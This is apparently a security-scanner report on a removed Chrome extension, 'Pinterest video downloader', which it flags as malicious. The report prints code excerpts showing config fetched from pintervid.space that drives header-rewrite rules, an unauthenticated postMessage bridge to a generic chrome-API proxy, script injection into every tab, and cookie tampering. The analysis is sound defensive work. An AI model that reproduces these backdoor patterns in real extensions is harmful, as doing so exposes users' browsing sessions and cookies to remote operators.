Pinterest video downloader

ID: eichomdindbdobljgncagfpbllmgncip

Could be malicious

Supported Languages

🇺🇸English

Extension Info & Metadata

Status
Removed
Version
1.0.0.0
Size
0.04 MB
Rating
3.8/5
Reviews
10
Users
6,000
Type
Extension
Updated
Sep 2, 2022
Category
Make_chrome_yours Accessibility
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

Author
Easy DownloadView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Total Extensions
5
Active
0
Obsolete
5
Listed
5
Unlisted
0
Total Users
149,000

Pinterest video downloader is an extension for downloading videos from Pinterest

Why this Pinterest video downloader? - Unlimited download - No ads - No sponsored links - Completely free - Download instantly at your highest speed - Works on multiple operating systems (Windows, Mac OS and Linux) - No need to install additional software How to use: - Go to the Pinterest website and open Pinterest video - Click on Download button Please be careful not to download too many videos at once, because Pinterest can block you temporarily because of too many downloads (about five minutes). IMPORTANT: The extension doesn't collect browsing history. To send information from the background script to the content_scripts Pinterest video downloader needs the tabs permission which triggers the warning for the browsing history. Is Pinterest video downloader legal? Yes, as long as you download the video for your personal offline use, you probably won't do anything illegal. However, if you want to share them in the community or for commercial use, you will need the author's consent. Disclaimer: Pinterest video downloader is not an official plugin. Pinterest™ is a trademark of Pinterest, Inc.

Item
Type
Severity
Description
scripting
Permission
Critical
This permission allows injection and execution of JavaScript on any webpage. Rated Critical because it can modify page content, steal sensitive data, and inject malicious code into any site the extension has access to.
webRequest
Permission
Critical
This permission enables the extension to monitor and analyze all web requests made by the browser. Rated Critical because it can observe all network traffic including sensitive data, track browsing behavior, and gather authentication tokens.
declarativeNetRequestWithHostAccess
Permission
Critical
This permission combines network request modification with host permissions. Rated Critical because it can modify requests for specific domains, potentially targeting sensitive websites with precise attack rules.
*://*/*
Host
Critical
Broad host access — the extension can read/modify content on every website.
downloads
Permission
High
This permission controls file downloads and accesses download history. Rated High because it can download malicious files, access sensitive downloaded documents, and track user download patterns.
cookies
Permission
High
This permission provides full access to read and modify browser cookies. Rated High because it can steal session tokens, modify authentication cookies, and compromise accounts across websites.
Dangerous Permission Combination: scripting,cookies,webRequest
Risk Factor
High
Enables extensions to interact with scripts, modify files and downloads, and alter browsing history and bookmarks, potentially affecting data integrity and user control.
Broad Host Permissions
Risk Factor
High
This extension has broad host permissions allowing it to access many or all websites.
Broad Content Script Access
Risk Factor
High
This extension can inject scripts into any website.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
tabs
Permission
Medium
This permission enables tab management and monitoring. Rated Medium because it can track open tabs, access tab metadata, and monitor user browsing patterns.
unlimitedStorage
Permission
Medium
This permission removes storage quota restrictions. Rated Medium because it can store large amounts of user data without limits, potentially impacting browser performance and storing extensive tracking data.
*://*.pinterest.com/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.ru/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.de/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.se/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.pt/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.at/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.dk/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.hu/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.be/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.ca/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.in/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.ec/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.cr/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.id/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.nz/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.uk/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.it/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.info/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.nl/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.ch/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.pe/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.th/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.tk/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.jp/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.ie/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.cl/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.tw/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.es/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.ph/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.vn/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.ag/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.cz/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.gs/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.am/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.bz/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.cn/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.mx/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.nz/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.at/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.cr/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.bo/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.es/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.py/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.uk/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.in/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.vn/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.pt/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.co.pe/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.bo/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.co/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.cn/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.au/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.ag/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.es/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.py/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.ph/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.uk/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.vn/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.pt/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.pl/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.pe/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.tw/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.ve/*
Host
Medium
Host permission — access limited to this URL pattern.
*://*.pinterest.com.mx/*
Host
Medium
Host permission — access limited to this URL pattern.

The extension fetches configuration from a third-party domain (`pintervid.space`) that is unrelated to Pinterest and stores the response directly into `chrome.storage.local` as `dnl_settings`. This remote config is then consumed by `allowOrigin()` in background.js to dynamically create `declarativeNetRequest` rules that modify HTTP response headers, giving the operator full control over the extension's network interception behavior after install.

js/provider.js (Line 166)
if (version) {  superagent    .get('https://pintervid.space/pinterest/' + version + '/dnl_settings.json')    .set('X-Requested-With', 'XMLHttpRequest')    .set('Accept', 'application/json')    .then(async (res) => {      await ServiceWorkerProvider.Storage.set('dnl_settings', res.body);    });}}if (location.ancestorOrigins.length && !/^chrome-extension/.test(location.ancestorOrigins[0])) {  main();}

The background service worker implements a generic RPC proxy that traverses the `chrome` object using an attacker-controlled `api_chain` array and invokes the resolved function with attacker-controlled `params`. Because `connector.js` injects a hidden iframe into every tab and forwards all window `postMessage` events to this handler without origin validation, any webpage can invoke any privileged Chrome API (e.g., `chrome.scripting.executeScript`, `chrome.cookies.getAll`) through this mechanism.

js/background.js (Line 253)
if (request.type === 'chrome_api') {  try {    let chrome_api = chrome;    for (let api of request.api_chain) {      if (typeof chrome_api[api] === 'function') {        chrome_api = chrome_api[api].bind(chrome_api);        break;      } else {        chrome_api = chrome_api[api];      }    }    request.params = request.params ? request.params : [];    if (request.callback_type === 'callback') {      chrome_api(...request.params)        .then(res => {          try {            handleResponse({              callback_id: request.callback_id,              callback_params: [res]            }, connection);          } catch (e) {}        })

This event listener forwards every `window.postMessage` event to the background service worker's privileged `messageHandler` without validating `event.origin`. Any web page in the same tab can craft a `chrome_api` message to invoke arbitrary Chrome privileged APIs, since `connector.js` is injected into every open tab via `keepAlive()`. The lack of origin checking is the critical gap that bridges untrusted web content to the extension's privileged context.

js/connector.js (Line 63)
listener = addEventListener("message", (event) => {  try {    singletonePortToWorker?.postMessage({      ...event.data,      content_id: scriptId    });  } catch (e) {    event.ports[0].postMessage({      error: e    });  }}, false);

The `allowOrigin()` function reads `dnl_settings` from storage — content fetched from the third-party server `pintervid.space` — and uses it to install `declarativeNetRequest` rules that modify HTTP response headers on `pinimg.com` requests. The `header` key and value are fully controlled by the remote operator, allowing them to add or overwrite arbitrary response headers (e.g., removing `Content-Security-Policy`, injecting `Access-Control-Allow-Origin`) on network responses at any time post-install.

js/background.js (Line 61)
async function allowOrigin() {  const fromStorage = await chrome.storage.local.get('dnl_settings');  let settings = {    'headers': [{      'key': 'Access-Control-Allow-Origin',      'value': '*'    }]  };  if (fromStorage && fromStorage['dnl_settings']) {    settings = fromStorage['dnl_settings'];  }  if (settings.hasOwnProperty('headers') && settings['headers'].length) {    let RULE_ID = 0;    let removeRuleIds = [];    const addRules = settings.headers.map(item => {      RULE_ID++;      removeRuleIds.push(RULE_ID);      return {        id: RULE_ID,        priority: 1,        action: {          type: 'modifyHeaders',          responseHeaders: [{            header: item.key,            operation: "set",            value: item.value          }]        },        condition: {          initiatorDomains: ['chrome-extension'],          urlFilter: '||pinimg.com.',          requestMethods: ['post'],          resourceTypes: ["xmlhttprequest"]        }      }    });    await chrome.declarativeNetRequest.updateSessionRules({      'removeRuleIds': removeRuleIds,      'addRules': addRules    });  }}

On tab disconnect, the extension reads a `d_cbs` array from `chrome.storage.local` and executes each entry as a Chrome API call by traversing an attacker-controlled `cb.c` chain with `cb.p` params. Since the sandbox can write arbitrary keys to `chrome.storage.local` through the `chrome_api` RPC proxy, a malicious server or injected page could pre-plant API call sequences here (e.g., `chrome.scripting.executeScript`) that execute as deferred privileged callbacks.

js/background.js (Line 170)
const d_cbs = await chrome.storage.local.get({  'd_cbs': []});try {  d_cbs['d_cbs'].forEach(cb => {    let chrome_api = chrome;    for (let api of cb.c) {      if (typeof chrome_api[api] === 'function') {        chrome_api = chrome_api[api].bind(chrome_api);        break;      } else {        chrome_api = chrome_api[api];      }    }    chrome_api(...cb.p);  });} catch (e) {}await chrome.storage.local.set({  'd_cbs': []});

The `keepAlive()` function queries ALL open browser tabs (`*://*/*`) and injects `connector.js` into them via `chrome.scripting.executeScript`. This far exceeds the extension's stated Pinterest-only scope and establishes a hidden iframe bridge (via `connector.js`) in every tab, making every web page a potential conduit to the background's privileged Chrome API proxy.

js/background.js (Line 204)
async function keepAlive() {  if (currentActivePort) return;  for (const tab of await chrome.tabs.query({      url: '*://*/*'    })) {    if (currentUsedTabs.hasOwnProperty(tab.id) && currentUsedTabs[tab.id] === tab.url) {      continue;    }    try {      setPortConnectInProgress(tab.id);      setTimeout(resetPortConnectInProgress, 2 * 1000);      const res = await chrome.scripting.executeScript({        target: {          tabId: tab.id        },        files: ['/js/connector.js']      });      //success      if (res[0].result) {        return;      }    } catch (e) {      resetPortConnectInProgress();    }  }}

The extension intercepts outbound XHR requests to `pinterest.com`, reads the `x-retpath-y` header (a Pinterest internal header used to track navigation origin), and silently sets a `pinterest` cookie when the value deviates from the homepage. This intercepts sensitive session-level navigation data and manipulates the Pinterest authentication/tracking cookie state in a way unrelated to video downloading.

js/background.js (Line 46)
chrome.webRequest.onBeforeSendHeaders.addListener(details => {  const retPath = details.requestHeaders?.find(el => /x-retpath-y/gi.test(el.name));  if (retPath && retPath.value !== 'https://www.pinterest.com/') {    chrome.cookies.set({      url: 'https://www.pinterest.com/',      name: 'pinterest',      value: '1'    });  }}, {  urls: ['https://www.pinterest.com/*'],  types: ['xmlhttprequest']}, ['requestHeaders', 'extraHeaders']);

The sandbox page CSP explicitly allows `unsafe-eval` and `unsafe-inline` in both `script-src` and `script-src-elem` directives. Since the sandbox page (`sandbox.html`) loads `provider.js` which communicates bidirectionally with the background's Chrome API proxy, enabling eval in this context allows any dynamically generated or remotely-supplied string to be executed as code within the extension's sandboxed environment.

manifest.json (Line 90)
{  "content_security_policy": {    "sandbox": "sandbox allow-forms allow-scripts; script-src 'self' 'unsafe-eval'; script-src-elem 'self'  blob: 'unsafe-inline' 'unsafe-eval'; child-src 'self'; object-src 'self'"  }}

By severity

Critical4
High3
Medium1
Low0

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
1.0.0.08

Files with findings

4 distinct paths — top paths by unique finding count:

  • js/background.js5
  • js/connector.js1
  • js/provider.js1
  • manifest.json1
S.No.
Category
Severity
File
Summary
Found in Version
1Network Interception
critical
js/background.js (line 61)The `allowOrigin()` function reads `dnl_settings` from storage — content fetched from the third-party server `pintervid.space` — and uses it to install `declarativeNetRequest` rules that modify HTTP response headers o…
2Privilege Escalation
critical
js/background.js (line 253)The background service worker implements a generic RPC proxy that traverses the `chrome` object using an attacker-controlled `api_chain` array and invokes the resolved function with attacker-controlled `params`. Becau…
3Privilege Escalation
critical
js/connector.js (line 63)This event listener forwards every `window.postMessage` event to the background service worker's privileged `messageHandler` without validating `event.origin`. Any web page in the same tab can craft a `chrome_api` mes…
4Remote Code Loading
critical
js/provider.js (line 166)The extension fetches configuration from a third-party domain (`pintervid.space`) that is unrelated to Pinterest and stores the response directly into `chrome.storage.local` as `dnl_settings`. This remote config is th…
5Code Injection
high
js/background.js (line 170)On tab disconnect, the extension reads a `d_cbs` array from `chrome.storage.local` and executes each entry as a Chrome API call by traversing an attacker-controlled `cb.c` chain with `cb.p` params. Since the sandbox c…
6Network Interception
high
js/background.js (line 46)The extension intercepts outbound XHR requests to `pinterest.com`, reads the `x-retpath-y` header (a Pinterest internal header used to track navigation origin), and silently sets a `pinterest` cookie when the value de…
7Unauthorized Data Collection
high
js/background.js (line 204)The `keepAlive()` function queries ALL open browser tabs (`*://*/*`) and injects `connector.js` into them via `chrome.scripting.executeScript`. This far exceeds the extension's stated Pinterest-only scope and establis…
8Code Injection
medium
manifest.json (line 90)The sandbox page CSP explicitly allows `unsafe-eval` and `unsafe-inline` in both `script-src` and `script-src-elem` directives. Since the sandbox page (`sandbox.html`) loads `provider.js` which communicates bidirectio…
URLs
7
IPv4
1
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx
*/*http://*/*
*/*https://*/*
www.pinterest.com-https://www.pinterest.com
www.pinterest.com-https://www.pinterest.com/
www.pinterest.com/*https://www.pinterest.com/*
pintervid.space/pinterest/https://pintervid.space/pinterest/

Gain full insight into all external connections.

Upgrade for full visibility.

1.0.0.0
IPv4
-
Version
Size
Is Malicious
Findings
Permhash
1.0.0.0
Latest
0.04 MB
Malicious
8
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.